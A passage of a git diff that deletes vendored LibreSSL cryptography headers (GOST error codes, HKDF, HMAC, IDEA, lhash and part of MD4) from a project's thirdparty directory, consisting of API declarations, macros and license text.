-#define EVP_PKEY_CTRL_GOST_SIG_FORMAT	(EVP_PKEY_ALG_CTRL+2)
-#define EVP_PKEY_CTRL_GOST_SET_DIGEST	(EVP_PKEY_ALG_CTRL+3)
-#define EVP_PKEY_CTRL_GOST_GET_DIGEST	(EVP_PKEY_ALG_CTRL+4)
-
-#define GOST_SIG_FORMAT_SR_BE	0
-#define GOST_SIG_FORMAT_RS_LE	1
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_GOST_strings(void);
-
-/* Error codes for the GOST functions. */
-
-/* Function codes. */
-#define GOST_F_DECODE_GOST01_ALGOR_PARAMS		 104
-#define GOST_F_ENCODE_GOST01_ALGOR_PARAMS		 105
-#define GOST_F_GOST2001_COMPUTE_PUBLIC			 106
-#define GOST_F_GOST2001_DO_SIGN				 107
-#define GOST_F_GOST2001_DO_VERIFY			 108
-#define GOST_F_GOST2001_KEYGEN				 109
-#define GOST_F_GOST89_GET_ASN1_PARAMETERS		 102
-#define GOST_F_GOST89_SET_ASN1_PARAMETERS		 103
-#define GOST_F_GOST_KEY_CHECK_KEY			 124
-#define GOST_F_GOST_KEY_NEW				 125
-#define GOST_F_GOST_KEY_SET_PUBLIC_KEY_AFFINE_COORDINATES 126
-#define GOST_F_PARAM_COPY_GOST01			 110
-#define GOST_F_PARAM_DECODE_GOST01			 111
-#define GOST_F_PKEY_GOST01_CTRL				 116
-#define GOST_F_PKEY_GOST01_DECRYPT			 112
-#define GOST_F_PKEY_GOST01_DERIVE			 113
-#define GOST_F_PKEY_GOST01_ENCRYPT			 114
-#define GOST_F_PKEY_GOST01_PARAMGEN			 115
-#define GOST_F_PKEY_GOST01_SIGN				 123
-#define GOST_F_PKEY_GOST_MAC_CTRL			 100
-#define GOST_F_PKEY_GOST_MAC_KEYGEN			 101
-#define GOST_F_PRIV_DECODE_GOST01			 117
-#define GOST_F_PUB_DECODE_GOST01			 118
-#define GOST_F_PUB_ENCODE_GOST01			 119
-#define GOST_F_PUB_PRINT_GOST01				 120
-#define GOST_F_UNPACK_SIGNATURE_CP			 121
-#define GOST_F_UNPACK_SIGNATURE_LE			 122
-
-/* Reason codes. */
-#define GOST_R_BAD_KEY_PARAMETERS_FORMAT		 104
-#define GOST_R_BAD_PKEY_PARAMETERS_FORMAT		 105
-#define GOST_R_CANNOT_PACK_EPHEMERAL_KEY		 106
-#define GOST_R_CTRL_CALL_FAILED				 107
-#define GOST_R_ERROR_COMPUTING_SHARED_KEY		 108
-#define GOST_R_ERROR_PARSING_KEY_TRANSPORT_INFO		 109
-#define GOST_R_INCOMPATIBLE_ALGORITHMS			 110
-#define GOST_R_INCOMPATIBLE_PEER_KEY			 111
-#define GOST_R_INVALID_DIGEST_TYPE			 100
-#define GOST_R_INVALID_IV_LENGTH			 103
-#define GOST_R_INVALID_MAC_KEY_LENGTH			 101
-#define GOST_R_KEY_IS_NOT_INITIALIZED			 112
-#define GOST_R_KEY_PARAMETERS_MISSING			 113
-#define GOST_R_MAC_KEY_NOT_SET				 102
-#define GOST_R_NO_PARAMETERS_SET			 115
-#define GOST_R_NO_PEER_KEY				 116
-#define GOST_R_NO_PRIVATE_PART_OF_NON_EPHEMERAL_KEYPAIR	 117
-#define GOST_R_PUBLIC_KEY_UNDEFINED			 118
-#define GOST_R_RANDOM_NUMBER_GENERATOR_FAILED		 120
-#define GOST_R_SIGNATURE_MISMATCH			 121
-#define GOST_R_SIGNATURE_PARTS_GREATER_THAN_Q		 122
-#define GOST_R_UKM_NOT_SET				 123
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/hkdf.h b/thirdparty/libressl/include/openssl/hkdf.h
deleted file mode 100644
index fb0fac3..0000000
--- a/thirdparty/libressl/include/openssl/hkdf.h
+++ /dev/null
@@ -1,64 +0,0 @@
-/* Copyright (c) 2014, Google Inc.
- *
- * Permission to use, copy, modify, and/or distribute this software for any
- * purpose with or without fee is hereby granted, provided that the above
- * copyright notice and this permission notice appear in all copies.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
- * SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
- * OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
- * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */
-
-#ifndef OPENSSL_HEADER_HKDF_H
-#define OPENSSL_HEADER_HKDF_H
-
-#include <openssl/evp.h>
-
-#if defined(__cplusplus)
-extern "C" {
-#endif
-
-/*
- * HKDF computes HKDF (as specified by RFC 5869) of initial keying
- * material |secret| with |salt| and |info| using |digest|, and
- * outputs |out_len| bytes to |out_key|. It returns one on success and
- * zero on error.
- *
- * HKDF is an Extract-and-Expand algorithm. It does not do any key
- * stretching, and as such, is not suited to be used alone to generate
- * a key from a password.
- */
-
-int HKDF(uint8_t *out_key, size_t out_len, const struct env_md_st *digest,
-    const uint8_t *secret, size_t secret_len, const uint8_t *salt,
-    size_t salt_len, const uint8_t *info, size_t info_len);
-
-/*
- * HKDF_extract computes a HKDF PRK (as specified by RFC 5869) from
- * initial keying material |secret| and salt |salt| using |digest|,
- * and outputs |out_len| bytes to |out_key|. The maximum output size
- * is |EVP_MAX_MD_SIZE|.  It returns one on success and zero on error.
- */
-int HKDF_extract(uint8_t *out_key, size_t *out_len,
-    const struct env_md_st *digest, const uint8_t *secret,
-    size_t secret_len, const uint8_t *salt, size_t salt_len);
-
-/*
- * HKDF_expand computes a HKDF OKM (as specified by RFC 5869) of
- * length |out_len| from the PRK |prk| and info |info| using |digest|,
- * and outputs the result to |out_key|. It returns one on success and
- * zero on error.
- */
-int HKDF_expand(uint8_t *out_key, size_t out_len,
-    const EVP_MD *digest, const uint8_t *prk, size_t prk_len,
-    const uint8_t *info,  size_t info_len);
-
-
-#if defined(__cplusplus)
-}  /* extern C */
-#endif
-
-#endif  /* OPENSSL_HEADER_HKDF_H */
diff --git a/thirdparty/libressl/include/openssl/hmac.h b/thirdparty/libressl/include/openssl/hmac.h
deleted file mode 100644
index f3418b3..0000000
--- a/thirdparty/libressl/include/openssl/hmac.h
+++ /dev/null
@@ -1,108 +0,0 @@
-/* $OpenBSD: hmac.h,v 1.12 2014/06/21 13:39:46 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-#ifndef HEADER_HMAC_H
-#define HEADER_HMAC_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_HMAC
-#error HMAC is disabled.
-#endif
-
-#include <openssl/evp.h>
-
-#define HMAC_MAX_MD_CBLOCK	128	/* largest known is SHA512 */
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct hmac_ctx_st {
-	const EVP_MD *md;
-	EVP_MD_CTX md_ctx;
-	EVP_MD_CTX i_ctx;
-	EVP_MD_CTX o_ctx;
-	unsigned int key_length;
-	unsigned char key[HMAC_MAX_MD_CBLOCK];
-} HMAC_CTX;
-
-#define HMAC_size(e)	(EVP_MD_size((e)->md))
-
-
-void HMAC_CTX_init(HMAC_CTX *ctx);
-void HMAC_CTX_cleanup(HMAC_CTX *ctx);
-
-#define HMAC_cleanup(ctx) HMAC_CTX_cleanup(ctx) /* deprecated */
-
-int HMAC_Init(HMAC_CTX *ctx, const void *key, int len,
-    const EVP_MD *md); /* deprecated */
-int HMAC_Init_ex(HMAC_CTX *ctx, const void *key, int len, const EVP_MD *md,
-    ENGINE *impl);
-int HMAC_Update(HMAC_CTX *ctx, const unsigned char *data, size_t len);
-int HMAC_Final(HMAC_CTX *ctx, unsigned char *md, unsigned int *len);
-unsigned char *HMAC(const EVP_MD *evp_md, const void *key, int key_len,
-    const unsigned char *d, size_t n, unsigned char *md, unsigned int *md_len);
-int HMAC_CTX_copy(HMAC_CTX *dctx, HMAC_CTX *sctx);
-
-void HMAC_CTX_set_flags(HMAC_CTX *ctx, unsigned long flags);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/idea.h b/thirdparty/libressl/include/openssl/idea.h
deleted file mode 100644
index f76bcae..0000000
--- a/thirdparty/libressl/include/openssl/idea.h
+++ /dev/null
@@ -1,100 +0,0 @@
-/* $OpenBSD: idea.h,v 1.10 2014/06/12 15:49:29 deraadt Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_IDEA_H
-#define HEADER_IDEA_H
-
-#include <openssl/opensslconf.h> /* IDEA_INT, OPENSSL_NO_IDEA */
-
-#ifdef OPENSSL_NO_IDEA
-#error IDEA is disabled.
-#endif
-
-#define IDEA_ENCRYPT	1
-#define IDEA_DECRYPT	0
-
-#define IDEA_BLOCK	8
-#define IDEA_KEY_LENGTH	16
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct idea_key_st
-	{
-	IDEA_INT data[9][6];
-	} IDEA_KEY_SCHEDULE;
-
-const char *idea_options(void);
-void idea_ecb_encrypt(const unsigned char *in, unsigned char *out,
-	IDEA_KEY_SCHEDULE *ks);
-void idea_set_encrypt_key(const unsigned char *key, IDEA_KEY_SCHEDULE *ks);
-void idea_set_decrypt_key(IDEA_KEY_SCHEDULE *ek, IDEA_KEY_SCHEDULE *dk);
-void idea_cbc_encrypt(const unsigned char *in, unsigned char *out,
-	long length, IDEA_KEY_SCHEDULE *ks, unsigned char *iv,int enc);
-void idea_cfb64_encrypt(const unsigned char *in, unsigned char *out,
-	long length, IDEA_KEY_SCHEDULE *ks, unsigned char *iv,
-	int *num,int enc);
-void idea_ofb64_encrypt(const unsigned char *in, unsigned char *out,
-	long length, IDEA_KEY_SCHEDULE *ks, unsigned char *iv, int *num);
-void idea_encrypt(unsigned long *in, IDEA_KEY_SCHEDULE *ks);
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/lhash.h b/thirdparty/libressl/include/openssl/lhash.h
deleted file mode 100644
index 9c63657..0000000
--- a/thirdparty/libressl/include/openssl/lhash.h
+++ /dev/null
@@ -1,235 +0,0 @@
-/* $OpenBSD: lhash.h,v 1.12 2014/06/12 15:49:29 deraadt Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-/* Header for dynamic hash table routines
- * Author - Eric Young
- */
-
-#ifndef HEADER_LHASH_H
-#define HEADER_LHASH_H
-
-#include <openssl/opensslconf.h>
-
-#include <stdio.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct lhash_node_st {
-	void *data;
-	struct lhash_node_st *next;
-#ifndef OPENSSL_NO_HASH_COMP
-	unsigned long hash;
-#endif
-} LHASH_NODE;
-
-typedef int (*LHASH_COMP_FN_TYPE)(const void *, const void *);
-typedef unsigned long (*LHASH_HASH_FN_TYPE)(const void *);
-typedef void (*LHASH_DOALL_FN_TYPE)(void *);
-typedef void (*LHASH_DOALL_ARG_FN_TYPE)(void *, void *);
-
-/* Macros for declaring and implementing type-safe wrappers for LHASH callbacks.
- * This way, callbacks can be provided to LHASH structures without function
- * pointer casting and the macro-defined callbacks provide per-variable casting
- * before deferring to the underlying type-specific callbacks. NB: It is
- * possible to place a "static" in front of both the DECLARE and IMPLEMENT
- * macros if the functions are strictly internal. */
-
-/* First: "hash" functions */
-#define DECLARE_LHASH_HASH_FN(name, o_type) \
-	unsigned long name##_LHASH_HASH(const void *);
-#define IMPLEMENT_LHASH_HASH_FN(name, o_type) \
-	unsigned long name##_LHASH_HASH(const void *arg) { \
-		const o_type *a = arg; \
-		return name##_hash(a); }
-#define LHASH_HASH_FN(name) name##_LHASH_HASH
-
-/* Second: "compare" functions */
-#define DECLARE_LHASH_COMP_FN(name, o_type) \
-	int name##_LHASH_COMP(const void *, const void *);
-#define IMPLEMENT_LHASH_COMP_FN(name, o_type) \
-	int name##_LHASH_COMP(const void *arg1, const void *arg2) { \
-		const o_type *a = arg1;		    \
-		const o_type *b = arg2; \
-		return name##_cmp(a,b); }
-#define LHASH_COMP_FN(name) name##_LHASH_COMP
-
-/* Third: "doall" functions */
-#define DECLARE_LHASH_DOALL_FN(name, o_type) \
-	void name##_LHASH_DOALL(void *);
-#define IMPLEMENT_LHASH_DOALL_FN(name, o_type) \
-	void name##_LHASH_DOALL(void *arg) { \
-		o_type *a = arg; \
-		name##_doall(a); }
-#define LHASH_DOALL_FN(name) name##_LHASH_DOALL
-
-/* Fourth: "doall_arg" functions */
-#define DECLARE_LHASH_DOALL_ARG_FN(name, o_type, a_type) \
-	void name##_LHASH_DOALL_ARG(void *, void *);
-#define IMPLEMENT_LHASH_DOALL_ARG_FN(name, o_type, a_type) \
-	void name##_LHASH_DOALL_ARG(void *arg1, void *arg2) { \
-		o_type *a = arg1; \
-		a_type *b = arg2; \
-		name##_doall_arg(a, b); }
-#define LHASH_DOALL_ARG_FN(name) name##_LHASH_DOALL_ARG
-
-typedef struct lhash_st {
-	LHASH_NODE **b;
-	LHASH_COMP_FN_TYPE comp;
-	LHASH_HASH_FN_TYPE hash;
-	unsigned int num_nodes;
-	unsigned int num_alloc_nodes;
-	unsigned int p;
-	unsigned int pmax;
-	unsigned long up_load; /* load times 256 */
-	unsigned long down_load; /* load times 256 */
-	unsigned long num_items;
-
-	unsigned long num_expands;
-	unsigned long num_expand_reallocs;
-	unsigned long num_contracts;
-	unsigned long num_contract_reallocs;
-	unsigned long num_hash_calls;
-	unsigned long num_comp_calls;
-	unsigned long num_insert;
-	unsigned long num_replace;
-	unsigned long num_delete;
-	unsigned long num_no_delete;
-	unsigned long num_retrieve;
-	unsigned long num_retrieve_miss;
-	unsigned long num_hash_comps;
-
-	int error;
-} _LHASH;	/* Do not use _LHASH directly, use LHASH_OF
-		 * and friends */
-
-#define LH_LOAD_MULT	256
-
-/* Indicates a malloc() error in the last call, this is only bad
- * in lh_insert(). */
-#define lh_error(lh)	((lh)->error)
-
-_LHASH *lh_new(LHASH_HASH_FN_TYPE h, LHASH_COMP_FN_TYPE c);
-void lh_free(_LHASH *lh);
-void *lh_insert(_LHASH *lh, void *data);
-void *lh_delete(_LHASH *lh, const void *data);
-void *lh_retrieve(_LHASH *lh, const void *data);
-void lh_doall(_LHASH *lh, LHASH_DOALL_FN_TYPE func);
-void lh_doall_arg(_LHASH *lh, LHASH_DOALL_ARG_FN_TYPE func, void *arg);
-unsigned long lh_strhash(const char *c);
-unsigned long lh_num_items(const _LHASH *lh);
-
-void lh_stats(const _LHASH *lh, FILE *out);
-void lh_node_stats(const _LHASH *lh, FILE *out);
-void lh_node_usage_stats(const _LHASH *lh, FILE *out);
-
-#ifndef OPENSSL_NO_BIO
-void lh_stats_bio(const _LHASH *lh, BIO *out);
-void lh_node_stats_bio(const _LHASH *lh, BIO *out);
-void lh_node_usage_stats_bio(const _LHASH *lh, BIO *out);
-#endif
-
-/* Type checking... */
-
-#define LHASH_OF(type) struct lhash_st_##type
-
-#define DECLARE_LHASH_OF(type) LHASH_OF(type) { int dummy; }
-
-#define CHECKED_LHASH_OF(type,lh) \
-  ((_LHASH *)CHECKED_PTR_OF(LHASH_OF(type),lh))
-
-/* Define wrapper functions. */
-#define LHM_lh_new(type, name) \
-  ((LHASH_OF(type) *)lh_new(LHASH_HASH_FN(name), LHASH_COMP_FN(name)))
-#define LHM_lh_error(type, lh) \
-  lh_error(CHECKED_LHASH_OF(type,lh))
-#define LHM_lh_insert(type, lh, inst) \
-  ((type *)lh_insert(CHECKED_LHASH_OF(type, lh), \
-		     CHECKED_PTR_OF(type, inst)))
-#define LHM_lh_retrieve(type, lh, inst) \
-  ((type *)lh_retrieve(CHECKED_LHASH_OF(type, lh), \
-		       CHECKED_PTR_OF(type, inst)))
-#define LHM_lh_delete(type, lh, inst) \
-  ((type *)lh_delete(CHECKED_LHASH_OF(type, lh),			\
-		     CHECKED_PTR_OF(type, inst)))
-#define LHM_lh_doall(type, lh,fn) lh_doall(CHECKED_LHASH_OF(type, lh), fn)
-#define LHM_lh_doall_arg(type, lh, fn, arg_type, arg) \
-  lh_doall_arg(CHECKED_LHASH_OF(type, lh), fn, CHECKED_PTR_OF(arg_type, arg))
-#define LHM_lh_num_items(type, lh) lh_num_items(CHECKED_LHASH_OF(type, lh))
-#define LHM_lh_down_load(type, lh) (CHECKED_LHASH_OF(type, lh)->down_load)
-#define LHM_lh_node_stats_bio(type, lh, out) \
-  lh_node_stats_bio(CHECKED_LHASH_OF(type, lh), out)
-#define LHM_lh_node_usage_stats_bio(type, lh, out) \
-  lh_node_usage_stats_bio(CHECKED_LHASH_OF(type, lh), out)
-#define LHM_lh_stats_bio(type, lh, out) \
-  lh_stats_bio(CHECKED_LHASH_OF(type, lh), out)
-#define LHM_lh_free(type, lh) lh_free(CHECKED_LHASH_OF(type, lh))
-
-DECLARE_LHASH_OF(OPENSSL_STRING);
-DECLARE_LHASH_OF(OPENSSL_CSTRING);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/md4.h b/thirdparty/libressl/include/openssl/md4.h
deleted file mode 100644
index 04aacc9..0000000
--- a/thirdparty/libressl/include/openssl/md4.h
+++ /dev/null
@@ -1,103 +0,0 @@
-/* $OpenBSD: md4.h,v 1.16 2015/09/14 01:45:03 doug Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#include <stddef.h>
-
-#ifndef HEADER_MD4_H
-#define HEADER_MD4_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifdef OPENSSL_NO_MD4
-#error MD4 is disabled.
-#endif
-
-/*
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- * ! MD4_LONG has to be at least 32 bits wide.                     !
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- */
-
-#define MD4_LONG unsigned int
-
-#define MD4_CBLOCK	64
-#define MD4_LBLOCK	(MD4_CBLOCK/4)
-#define MD4_DIGEST_LENGTH 16
-
-typedef struct MD4state_st
-	{
-	MD4_LONG A,B,C,D;
-	MD4_LONG Nl,Nh;
-	MD4_LONG data[MD4_LBLOCK];
-	unsigned int num;
-	} MD4_CTX;
-
-int MD4_Init(MD4_CTX *c);
-int MD4_Update(MD4_CTX *c, const void *data, size_t len);
-int MD4_Final(unsigned char *md, MD4_CTX *c);
-unsigned char *MD4(const unsigned char *d, size_t n, unsigned char *md);
-void MD4_Transform(MD4_CTX *c, const unsigned char *b);
-#ifdef  __cplusplus
